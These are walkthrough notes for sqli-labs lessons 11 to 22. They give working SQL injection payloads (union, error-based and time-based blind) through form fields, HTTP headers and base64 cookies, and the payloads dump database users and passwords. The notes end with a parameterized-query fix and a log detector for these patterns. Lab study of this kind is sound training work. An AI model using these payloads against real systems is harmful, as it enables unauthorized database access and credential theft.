sqli-labs walkthrough notes (less11-less22)
less-11
Both the submitted username and password are 123. The SQL statement that gets executed is as follows. The universal-password trick works here. The -- + comment cannot be used here (the payloads below use # instead).
payload: (submitted via POST)
uname=admin' order by 2#&passwd=123&submit=Submit
// returns normally
uname=admin' order by 3#&passwd=123&submit=Submit
// error, so the query has 2 columns
uname=-admin' union select 1,2#&passwd=123&submit=Submit
// 1 and 2 are echoed; because the user admin exists, -admin is used so that the first SELECT matches nothing and the union row is displayed
// database name:
uname=-admin' union select 1,database()#&passwd=123&submit=Submit
// table names:
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
// column names:
uname=-admin' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
// data:
uname=-admin' union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin' union select 1,group_concat(password) from users #&passwd=&submit=Submit
less-12
Basically the same as less-11, but the closing is ").
payload:
// database name:
uname=-admin") union select 1,database()#&passwd=123&submit=Submit
// table names:
uname=-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
// column names:
uname=-admin") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
// data:
uname=-admin") union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin") union select 1,group_concat(password) from users #&passwd=&submit=Submit
less-13
The closing is '), there is no echoed output, so error-based injection is used.
payload:
// database name:
uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
// table names:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
// column names:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
// data:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
less-14
Basically the same as less-13, but the closing is ".
payload:
// database name:
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
// table names:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
// column names:
uname=admin"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
// data:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
less-15
The closing is ' and no error is displayed, so time-based blind injection is used. if(length(database())=8,1,sleep(3)) means the page responds immediately when the length is correct and is delayed by 3 seconds when the length is wrong; if(length(database())=8,sleep(3),1) means it is delayed by 3 seconds when the length is correct and responds immediately when the length is wrong.
payload:
// database name length:
uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
// database name, one character at a time:
uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
// table names:
uname=admin' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
// column names:
uname=admin' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
// data:
uname=admin' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
less-16
Basically the same as less-15, but the closing is ").
payload:
// database name length:
uname=admin")and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
// delayed, so the length is 8
// database name, one character at a time:
uname=admin") and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
// table names:
uname=admin")and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
// column names:
uname=admin")and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
// data:
uname=admin") and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
less-17
There is a pitfall here: the code first looks up uname in the database and only allows the password update if that user exists. In other words, there is no SQL injection in uname; the injection is in passwd. The closing for passwd is '.
payload:
// database name:
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
// table names:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
// column names:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
// data:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(login) from users),0x7e),1)#&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&submit=Submit
// error: You can't specify target table 'users' for update in FROM clause
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit
// the emails table can be read instead; the error above is MySQL refusing a subquery that reads from the same table the UPDATE modifies.
less-18
Injection via HTTP headers: adding a ' after the User-Agent produces an error, which shows that this is the injection point. Looking at the source, uname and passwd are run through the check_input() function, so nothing can be injected through them, but in the code we saw
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`,
`username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);
that the User-Agent and the IP are inserted into the database, so can this be used for injection? First, a correct username and password must be submitted here, so that the username/password check passes and execution reaches the part that handles uagent.
payload:
// database name:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
// table names:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
// column names:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
// data:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(login) from users ),0x7e),1))#
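As an added example (not sqli-labs code), the less-18 insert rebuilt in Python with bound parameters: interpolated_sql() reproduces the statement text the lab's PHP builds, and log_agent() is the hardened form that stores the header verbatim. An in-memory SQLite table stands in for security.uagents, and the sample header is constructed.

```python
import sqlite3

# Added example, not sqli-labs code: an in-memory SQLite table stands in
# for security.uagents so the example runs offline.
SCHEMA = "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"


def interpolated_sql(uagent, ip, uname):
    """Statement text the way the lab's PHP builds it: a quote in uagent
    ends the string literal, and username is not even quoted."""
    return ("INSERT INTO uagents (uagent, ip_address, username) "
            f"VALUES ('{uagent}', '{ip}', {uname})")


def log_agent(con, uagent, ip, uname):
    """Hardened form: the values travel as bound parameters, so the
    header is stored as data no matter what characters it contains."""
    con.execute(
        "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
        (uagent, ip, uname),
    )
    row = con.execute(
        "SELECT uagent FROM uagents WHERE ip_address = ?", (ip,)
    ).fetchone()
    return row[0]


# Constructed header in the shape of the writeup's less-18 payload.
SAMPLE_UA = "Mozilla/5.0 (X11)',1, updatexml(1,concat(0x7e,database(),0x7e),1))#"


def demo(uagent=SAMPLE_UA, ip="127.0.0.1", uname="admin"):
    """Return (header stored verbatim?, statement the vulnerable code would run)."""
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    stored = log_agent(con, uagent, ip, uname)
    con.close()
    return stored == uagent, interpolated_sql(uagent, ip, uname)
```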
less-19
Not much different from less-18.
Adding a ' after the Referer causes an error.
payload:
// database name:
Referer: http://127.0.0.1/sqli/less-19/',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
// table names:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
// column names:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
// data:
Referer: http://127.0.0.1/sqli/less-19/',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
less-20
Appending a ' to the cookie causes an error, which means the cookie is the injection point, and there is echoed output.
payload:
Cookie: uname=admin' order by 3#; security_level=0
// returns normally
Cookie: uname=admin' order by 4#; security_level=0
// error, so the query has 3 columns
Cookie: uname=-admin' union select 1,2,3#; security_level=0
// 1, 2, 3 are echoed
// database name:
Cookie: uname=-admin' union select 1,2,database()#; security_level=0
// table names:
Cookie: uname=-admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#; security_level=0
// column names:
Cookie: uname=-admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#; security_level=0
// data:
Cookie: uname=-admin' union select 1,2,(select group_concat(password) from users)#; security_level=0
less-21
Basically the same as less-20, but the closing is ') and the cookie value is base64-encoded; error-based injection must be used.
A valid Base64 string has a length that is a multiple of 4; every character is one of the 65 symbols A-Z, a-z, 0-9, +, / and =, and if = appears it must be at the end.
payload:
// database name:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSM=; security_level=0
// table names:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSwxKSM=; security_level=0
// column names:
Cookie: uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDEpIw==; security_level=0
// data:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
// the payloads are those of less-13, base64-encoded (with Burp).
less-22
Basically the same as less-21, but the closing is ".
payload:
// database name:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw==; security_level=0
// table names:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpLDEpIw==; security_level=0
// column names:
Cookie: uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyksMHg3ZSksMSkj; security_level=0
// data:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
// the payloads are those of less-14, base64-encoded (with Burp).
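As an added example that is not part of the original writeup, a small Python log-review classifier for the injection points covered in less-11 to less-22: it decodes less-21/22 style base64 cookie values using the validity rule described in the less-21 notes, scans the POST body, Cookie, User-Agent and Referer for the union, updatexml and sleep() indicators used above, and treats a sleep() request whose response was not slow as an unconfirmed timing probe (the less-15/16 case where the injected condition was false). The request format, field names, latency threshold and sample requests are all assumptions constructed for the example.

```python
import base64, binascii, re
from urllib.parse import parse_qs, unquote

# Added example, not part of the writeup: a log-review heuristic for the
# three techniques used in less-11..22 (not a SQL parser; thresholds assumed).
PATTERNS = {
    "union": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "error": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "time": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}
# Base64 as described for less-21: alphabet A-Z a-z 0-9 + /, length a
# multiple of 4, '=' only as trailing padding.
B64_RE = re.compile(r"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$")

def decode_cookie_value(value):
    """Return the plaintext of a base64 cookie value, or the value itself."""
    value = unquote(value)  # %3D -> '='; plain unquote keeps '+' intact
    if value and B64_RE.match(value):
        try:
            return base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except (binascii.Error, UnicodeDecodeError):
            pass
    return value

def classify(req, slow_ms=2000):
    """Collect indicators from every sink the lab uses: body, Cookie, UA, Referer."""
    fields = [v for vals in parse_qs(req.get("body", ""), keep_blank_values=True).values() for v in vals]
    for part in req.get("cookie", "").split(";"):
        fields.append(decode_cookie_value(part.strip().partition("=")[2]))
    fields += [req.get("user_agent", ""), req.get("referer", "")]
    hits = {name for f in fields for name, rx in PATTERNS.items() if rx.search(f)}
    # sleep() with a fast response means the injected condition evaluated false
    if "time" in hits and req.get("latency_ms", 0) < slow_ms:
        hits.discard("time")
        hits.add("time-probe-no-delay")
    return sorted(hits)

# Constructed sample requests modelled on the writeup's payloads (not real traffic).
SAMPLES = {
    "less-11": {"body": "uname=-admin' union select 1,database()#&passwd=123&submit=Submit"},
    "less-15": {"body": "uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit", "latency_ms": 3100},
    "less-18": {"body": "uname=admin&passwd=admin", "user_agent": "Mozilla/5.0',1, updatexml(1,concat(0x7e,database(),0x7e),1))#"},
    "less-21": {"cookie": "uname=" + base64.b64encode(b"admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#").decode() + "; security_level=0"},
    "benign": {"body": "uname=admin&passwd=123&submit=Submit", "cookie": "uname=YWRtaW4=; security_level=0"},
}

def scan_samples():
    return {name: classify(req) for name, req in SAMPLES.items()}
```

A cookie value that merely looks like base64 decodes to noise, which none of the patterns match, so the decoder is safe to apply blindly to every cookie.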